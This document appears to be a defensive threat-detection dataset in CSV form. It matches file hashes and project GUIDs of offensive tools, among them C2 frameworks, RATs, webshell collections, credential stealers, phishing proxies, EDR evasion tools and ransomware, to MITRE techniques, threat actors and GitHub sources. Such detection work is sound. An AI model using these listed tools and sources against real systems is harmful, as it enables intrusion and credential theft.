"*A99F07FBB9AD4C798BBF570E4C3FEA33AB95E10479F204BE18041EC07BD8CFFF*",".{0,1000}A99F07FBB9AD4C798BBF570E4C3FEA33AB95E10479F204BE18041EC07BD8CFFF.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","#filehash","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","32843"
"*a9a231b0e4125b73e4aebf024857c6fd1bcada83dc74c6e328abd54ffa795cf1*",".{0,1000}a9a231b0e4125b73e4aebf024857c6fd1bcada83dc74c6e328abd54ffa795cf1.{0,1000}","offensive_tool_keyword","cliws","Cross platform interactive bind/reverse PTY shell","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Dispossessor","C2","https://github.com/b23r0/cliws","1","0","#filehash","N/A","10","10","159","29","2023-11-06T02:19:16Z","2021-10-24T04:10:07Z","32844"
"*A9A26EE65BEDB50FD71BF89819EFFBF42E06D40525928F125A161B6395CECB52*",".{0,1000}A9A26EE65BEDB50FD71BF89819EFFBF42E06D40525928F125A161B6395CECB52.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","#filehash","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","32845"
"*a9a5ff8b8ba4b09ce959ef85b523d43c5f34b8142acded5fa8a5444756780880*",".{0,1000}a9a5ff8b8ba4b09ce959ef85b523d43c5f34b8142acded5fa8a5444756780880.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","32846"
"*a9a8593db4e3f0d2b00c3683e029af751e6897bcb525fa0dc38777fe3bfb5c40*",".{0,1000}a9a8593db4e3f0d2b00c3683e029af751e6897bcb525fa0dc38777fe3bfb5c40.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","32847"
"*a9ada318adc60090587f06cac5d110f274f1fc75e7705c09fc27b8921aa32651*",".{0,1000}a9ada318adc60090587f06cac5d110f274f1fc75e7705c09fc27b8921aa32651.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","32850"
"*a9b13111606ca8ed948030515217c0e1af7cf2af2af8eb034999ff9e3f071b24*",".{0,1000}a9b13111606ca8ed948030515217c0e1af7cf2af2af8eb034999ff9e3f071b24.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","32851"
"*a9b1d358b072c89b85d9d83f024233afcb32a226fa25ce0c10828db705a10dcf*",".{0,1000}a9b1d358b072c89b85d9d83f024233afcb32a226fa25ce0c10828db705a10dcf.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","32852"
"*a9b3834be408b66c53b125a888e0f98899603fd79fcbe980dded3c6896d9bf34*",".{0,1000}a9b3834be408b66c53b125a888e0f98899603fd79fcbe980dded3c6896d9bf34.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","32853"
"*a9b451f93e8ead69f036bdc262bf7700b2d18789f081bf3c678da72233730cec*",".{0,1000}a9b451f93e8ead69f036bdc262bf7700b2d18789f081bf3c678da72233730cec.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","32854"
"*a9ba6f29ebb95e2e65f1e05b0f61d0a32a3bcd64d0589f35f41b69ba02d54ed8*",".{0,1000}a9ba6f29ebb95e2e65f1e05b0f61d0a32a3bcd64d0589f35f41b69ba02d54ed8.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","32856"
"*a9bbb6cb0597d7f59a85f981550e52f148f023a0576434ba9396bc8f5eb3f989*",".{0,1000}a9bbb6cb0597d7f59a85f981550e52f148f023a0576434ba9396bc8f5eb3f989.{0,1000}","offensive_tool_keyword","ChromeKatz","Dump cookies directly from Chrome process memory","T1555.003 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Meckazin/ChromeKatz","1","0","#filehash","N/A","10","10","1171","115","2024-11-26T12:53:22Z","2023-12-07T22:27:06Z","32857"
"*a9c25f6e6b4a7279424aba73343f268a385a18ca2c735b6e9869dbbaada3aecb*",".{0,1000}a9c25f6e6b4a7279424aba73343f268a385a18ca2c735b6e9869dbbaada3aecb.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","32858"
"*a9d6d8e1051e28d933a3979f20e8fd7eb85611d2014502d093aa879681bbbc26*",".{0,1000}a9d6d8e1051e28d933a3979f20e8fd7eb85611d2014502d093aa879681bbbc26.{0,1000}","offensive_tool_keyword","Browser Data Grabber","credential access tool used by the Dispossessor ransomware group","T1003 - T1555 - T1081 - T1552","TA0006","N/A","Dispossessor","Credential Access","https://github.com/n37sn4k3/BrowserDataGrabber","1","0","#filehash","N/A","10","1","7","4","2018-05-28T15:49:03Z","2018-05-04T12:33:32Z","32864"
"*a9d77bda6fcac6672b88c4252fce92bc9eb6a00186ace0173f02b72f336d3fec*",".{0,1000}a9d77bda6fcac6672b88c4252fce92bc9eb6a00186ace0173f02b72f336d3fec.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","32865"
"*a9e7d95771dd6c81e46c6c94aefd56695e8f824002532d7a53501fbe645d8ebf*",".{0,1000}a9e7d95771dd6c81e46c6c94aefd56695e8f824002532d7a53501fbe645d8ebf.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","32866"
"*A9EAA820-EC72-4052-80D0-A2CCBFCC83E6*",".{0,1000}A9EAA820\-EC72\-4052\-80D0\-A2CCBFCC83E6.{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","0","#GUIDproject","N/A","10","10","1225","323","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z","32867"
"*a9ecfb28564d208704c7463424adf0f1b0e10cbb789cfbb7bafc9e1edc8ec4cd*",".{0,1000}a9ecfb28564d208704c7463424adf0f1b0e10cbb789cfbb7bafc9e1edc8ec4cd.{0,1000}","offensive_tool_keyword","antSword","cross-platform website management toolkit - abused by attackers - supports the use of web shells","T1505.003 - T1059 - T1100 - T1027 - T1219 - T1071","TA0002 - TA0003 - TA0005 - TA0011","antSword webshell","APT41 - APT15","C2","https://github.com/AntSwordProject/antSword","1","0","#filehash","N/A","10","10","4010","616","2025-01-20T12:48:42Z","2016-03-11T09:28:00Z","32868"
"*a9f51500eba6088cde85a398ebe8d14f4fb52a931f9988049ab7e14570f39498*",".{0,1000}a9f51500eba6088cde85a398ebe8d14f4fb52a931f9988049ab7e14570f39498.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","32869"
"*a9f7d67e29c2b7f2059636c73945b9946185a235dfb12e346e07eb7b0650f714*",".{0,1000}a9f7d67e29c2b7f2059636c73945b9946185a235dfb12e346e07eb7b0650f714.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","32870"
"*aa013dcded3e67135ec91768764bc46d0509c78f061134e1a7917603fff3d6a8*",".{0,1000}aa013dcded3e67135ec91768764bc46d0509c78f061134e1a7917603fff3d6a8.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","#filehash","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","32875"
"*aa09c80172ca9e37f28d8da004771b57c2ba1eac4a8957b7b0422c0fcbd6f59d*",".{0,1000}aa09c80172ca9e37f28d8da004771b57c2ba1eac4a8957b7b0422c0fcbd6f59d.{0,1000}","offensive_tool_keyword","reconftw","reconFTW is a tool designed to perform automated recon on a target domain by running the best set of tools to perform scanning and finding out vulnerabilities","T1595 - T1590 - T1592 - T1596 - T1598 - T1046 - T1599 - T1213 - T1597","TA0043 - TA0042 - TA0007 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/six2dez/reconftw","1","0","#filehash #linux","N/A","7","10","6202","982","2025-04-22T13:01:31Z","2020-12-30T23:52:52Z","32876"
"*aa0daaab2228d5befff8982d5b44267a0272e971799dd77225449e005ec5d83e*",".{0,1000}aa0daaab2228d5befff8982d5b44267a0272e971799dd77225449e005ec5d83e.{0,1000}","offensive_tool_keyword","lolminer","NVIDIA+AMD GPU Miner","T1496","TA0040","N/A","N/A","Cryptomining","https://github.com/Lolliedieb/lolMiner-releases","1","0","#filehash","N/A","9","10","2781","601","2025-02-01T20:03:57Z","2018-10-27T20:35:03Z","32877"
"*aa12c40bc0ef87b1b706f1e9062d72d8c67c3b4b3347741efb38cf71817777d2*",".{0,1000}aa12c40bc0ef87b1b706f1e9062d72d8c67c3b4b3347741efb38cf71817777d2.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","Earth Lusca","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","#filehash","N/A","8","10","11931","1725","2025-04-20T11:30:29Z","2020-11-13T16:35:20Z","32878"
"*aa14822e2f2acd7b8aff1ebf1f2e7e9f800f6089f868ec7464af6ac01d7f9b3c*",".{0,1000}aa14822e2f2acd7b8aff1ebf1f2e7e9f800f6089f868ec7464af6ac01d7f9b3c.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","32880"
"*aa1b9c1ff92922f5a3d2119505c808c21e0cd2f6b6c5639eaafc84b875d8bbb6*",".{0,1000}aa1b9c1ff92922f5a3d2119505c808c21e0cd2f6b6c5639eaafc84b875d8bbb6.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","32881"
"*aa3939fc357723135870d5036b12a67097b03309*",".{0,1000}aa3939fc357723135870d5036b12a67097b03309.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","#filehash","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","32884"
"*aa3a685af2d72ed748f21a0190d6d08e226f717c8eea6b5694c2ad74a331a285*",".{0,1000}aa3a685af2d72ed748f21a0190d6d08e226f717c8eea6b5694c2ad74a331a285.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","#filehash","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","32885"
"*AA488748-3D0E-4A52-8747-AB42A7143760*",".{0,1000}AA488748\-3D0E\-4A52\-8747\-AB42A7143760.{0,1000}","offensive_tool_keyword","SharpADWS","SharpADWS Active Directory reconnaissance and exploitation for Red Teams via the Active Directory Web Services (ADWS)","T1087 - T1069 - T1018 - T1083 - T1595","TA0001 - TA0002 - TA0007","N/A","N/A","Discovery","https://github.com/wh0amitz/SharpADWS","1","0","#GUIDproject","N/A","7","6","538","59","2024-03-19T08:57:52Z","2024-02-13T17:28:00Z","32886"
"*aa4897e704cab54711515805dc9c40dccae5f3b913c120f643a6f7954396fae9*",".{0,1000}aa4897e704cab54711515805dc9c40dccae5f3b913c120f643a6f7954396fae9.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","32887"
"*aa5292f60e239072e657cd3a1ebd9604018aeeefc0835d4fc691c53c8e01886e*",".{0,1000}aa5292f60e239072e657cd3a1ebd9604018aeeefc0835d4fc691c53c8e01886e.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","32888"
"*aa52afe3cfd41aa6bdc1601a8f5a8dc2f0cac8a7af2cc162bd569082a12aaefa*",".{0,1000}aa52afe3cfd41aa6bdc1601a8f5a8dc2f0cac8a7af2cc162bd569082a12aaefa.{0,1000}","offensive_tool_keyword","sish","An open source serveo/ngrok alternative. HTTP(S)/WS(S)/TCP Tunnels to localhost using only SSH","T1572 - T1090.002","TA0010 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antoniomika/sish","1","0","#filehash","N/A","10","10","4203","325","2025-04-10T20:04:08Z","2019-02-15T15:36:23Z","32889"
"*AA5751006B1D1F18E8BD39F254DD31F26E1EC45FE6FC910B4BFCD0528A5ACBFD*",".{0,1000}AA5751006B1D1F18E8BD39F254DD31F26E1EC45FE6FC910B4BFCD0528A5ACBFD.{0,1000}","offensive_tool_keyword","Dispossessor","Dispossessor ransomware scripts and binaries","T1486 - T1489 - T1490 - T1107 - T1059 - T1001","TA0040 - TA0042","N/A","Dispossessor","Ransomware ","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","32891"
"*aa5838415ca20f0b6fe7858f457f129cf442940b3d4676cd243575809e53988e*",".{0,1000}aa5838415ca20f0b6fe7858f457f129cf442940b3d4676cd243575809e53988e.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","32892"
"*aa5ffd867153cca61f22d22f94fbe6e81416b0475f140ed6b546dcaba57d462d*",".{0,1000}aa5ffd867153cca61f22d22f94fbe6e81416b0475f140ed6b546dcaba57d462d.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","32893"
"*aa64f8d9cbcb6860541a56e17a6ca22371553ff32e01d218718b2155e7b8e475*",".{0,1000}aa64f8d9cbcb6860541a56e17a6ca22371553ff32e01d218718b2155e7b8e475.{0,1000}","offensive_tool_keyword","File-Tunnel","Tunnel TCP connections through a file","T1071 - T1105 - T1090","TA0005 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/fiddyschmitt/File-Tunnel","1","0","#filehash","N/A","10","10","925","82","2025-04-19T15:06:09Z","2023-02-05T12:57:45Z","32894"
"*aa659878813ee6b5ecb42d5d069fc48255b10337a357eb70fb5c002996c77239*",".{0,1000}aa659878813ee6b5ecb42d5d069fc48255b10337a357eb70fb5c002996c77239.{0,1000}","offensive_tool_keyword","SharpThief","A one-click program to steal the icon, resource information, version information, modification time, and digital signature (invalid) to make the program appear legitimate","T1036 - T1070 - T1078 - T1027 - T1202","TA0005 - TA0002 - TA0001","N/A","N/A","Defense Evasion","https://github.com/INotGreen/SharpThief","1","0","#filehash","N/A","8","4","372","37","2024-12-17T05:46:39Z","2024-03-05T05:34:50Z","32895"
"*aa6e70c1f44cc2d9ff2fd6ad67ffc7ff63d33bd63cf1059e185a588f9e0cc0ff*",".{0,1000}aa6e70c1f44cc2d9ff2fd6ad67ffc7ff63d33bd63cf1059e185a588f9e0cc0ff.{0,1000}","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0005 - TA0004","N/A","Evilnum","Defense Evasion","https://github.com/hfiref0x/UACME","1","0","#filehash","N/A","10","10","6711","1348","2025-03-09T03:33:26Z","2015-03-28T12:04:33Z","32898"
"*aa76179bd24e773ebf82edcbc58ba4f82c7b660883cc504d40f915fdabd35112*",".{0,1000}aa76179bd24e773ebf82edcbc58ba4f82c7b660883cc504d40f915fdabd35112.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","32899"
"*aa795eb7547007799a7e842878d781c0cc44ac61a7040204c5086ef84232a451*",".{0,1000}aa795eb7547007799a7e842878d781c0cc44ac61a7040204c5086ef84232a451.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","32900"
"*aa862e916af73e90f28c1407d5a411121cb33eeee5bf1bd2f130887b3dbdfd7f*",".{0,1000}aa862e916af73e90f28c1407d5a411121cb33eeee5bf1bd2f130887b3dbdfd7f.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","32902"
"*aa8b4f53e6ca8db9d8b13db3b0a250724b9ef472d99bb5c1ad0da8e10f7c95c7*",".{0,1000}aa8b4f53e6ca8db9d8b13db3b0a250724b9ef472d99bb5c1ad0da8e10f7c95c7.{0,1000}","offensive_tool_keyword","RealBlindingEDR","AV/EDR evasion","T1562.001 - T1548.001","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/myzxcg/RealBlindingEDR","1","0","#filehash","N/A","10","10","1050","190","2024-06-21T03:16:55Z","2023-10-28T07:06:53Z","32905"
"*aa8cfc4df8dea4d1fe806aef767c9c0f522ab3f49cc471c19bb0851dda5448fc*",".{0,1000}aa8cfc4df8dea4d1fe806aef767c9c0f522ab3f49cc471c19bb0851dda5448fc.{0,1000}","offensive_tool_keyword","pretender","MitM sidekick for relaying attacks featuring DHCPv6 DNS takeover as well as mDNS - LLMNR and NetBIOS-NS spoofing","T1557 - T1046 - T1590 - T1557.002","TA0008 - TA0011 - TA0007 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/RedTeamPentesting/pretender","1","0","#filehash","N/A","7","10","1089","79","2025-02-19T08:14:57Z","2022-07-11T13:23:23Z","32906"
"*aa96d396459aa3f3456ec948d37d92cb605fee98c72a5b64215c259113660518*",".{0,1000}aa96d396459aa3f3456ec948d37d92cb605fee98c72a5b64215c259113660518.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","32907"
"*aa980ebc0a241b454e61cba4c13767a8d203993dfd5d42db36a2958f9e6b3621*",".{0,1000}aa980ebc0a241b454e61cba4c13767a8d203993dfd5d42db36a2958f9e6b3621.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","32908"
"*aaa488ddde993d708967f1bd5ec942b367cf04abf5bcac865a5361319075c615*",".{0,1000}aaa488ddde993d708967f1bd5ec942b367cf04abf5bcac865a5361319075c615.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","32910"
